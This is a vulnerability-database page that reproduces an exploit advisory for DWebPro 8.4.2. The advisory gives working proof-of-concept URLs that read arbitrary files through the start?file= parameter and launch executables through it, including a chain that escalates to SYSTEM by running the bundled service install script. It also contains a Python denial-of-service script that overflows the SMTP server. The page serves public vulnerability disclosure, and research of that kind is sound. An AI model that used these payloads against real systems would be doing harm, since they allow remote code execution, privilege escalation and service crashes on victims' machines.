Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

DWebPro 8.4.2 Remote Binary Execution / File Inclusion

🗓️ 03 Oct 2016 00:00:00Reported by TulpaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 29 Views

DWebPro 8.4.2 Remote Binary Execution / File Inclusion vulnerabilit

Code
`# Exploit Title: DWebPro 8.4.2 Remote Binary Execution  
# Date: 01/10/2016  
# Exploit Author: Tulpa  
# Contact: [email protected]  
# Author website: www.tulpa-security.com  
# Author twitter: @tulpa_security  
# Vendor Homepage: http://www.dwebpro.com/  
# Software Link: http://www.dwebpro.com/download  
# Version: 8.4.2  
# Tested on: Windows 7 x86  
# Shout-out to carbonated and ozzie_offsec  
  
1. Description:  
  
DWebPro is a software package used for used for distributing dynamical web sites on CD/DVD or USB drives. It  
includes it's own web server called "primary web server" as well as an SMTP server. The POC below relates to the  
installation of DWebPro itself however it is conceivable that the vulnerability could be leveraged within certain  
contexts from a CD/DVD or USB drive. Dependent on the client configuration this vulnerability could be exploited  
remotely and/or locally. The SMTP server of DWebPro is also extremely susceptible to DOS attacks.  
  
2. Remote Binary Execution and Local File Inclusion Proof of Concept  
  
When browsing to the demo site installed with DWebPro you will find hyperlinks to various resources located on the  
local machine. One such example is "http://127.0.0.1:8080/dwebpro/start?file=C:\DWebPro\deploy\..\help\english  
\dwebpro.chm". Any file can be accessed on the vulnerable machine by simply replacing the start?file= location. It  
is important to note however that when browsing to an executable file through this vulnerability, that the web server  
will indeed run the application locally instead of prompting you for a download. As an example, the following will start the  
calculator process on the victim machine "http://192.168.0.1:8080/dwebpro/start?file=C:\Windows\system32\calc.exe".  
Calc.exe will by default execute with the same permission as the user who ran dwepro.exe initially.  
  
Basic cmd commands can also be executed such as with "http://192.168.0.1:8080/dwebpro/start?file=ipconfig".  
  
These privileges can be escalated to SYSTEM however by installing the application as a windows service which will  
automatically run on start up. In order to initiate that installation, the attacker could take advantage of a script  
which is installed by default and can be executed thanks to the LFI vulnerability. This can be accomplished by using  
"http://192.168.0.1:8080/dwebpro/start?file=C:\DWebPro\service\install.bat".  
  
3. Denial of Service Proof of Concept  
  
#!/usr/bin/python  
  
import socket  
import sys  
  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  
connect=s.connect(('192.168.0.1',25))  
  
evil = 'A' * 300  
s.recv(1024)  
s.send(evil)  
  
s.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Oct 2016 00:00Current
0.1Low risk
Vulners AI Score0.1
dwebproremote binary executionfile inclusionvulnerabilitydossmtp servercd/dvdusb drivespocwindows 7
29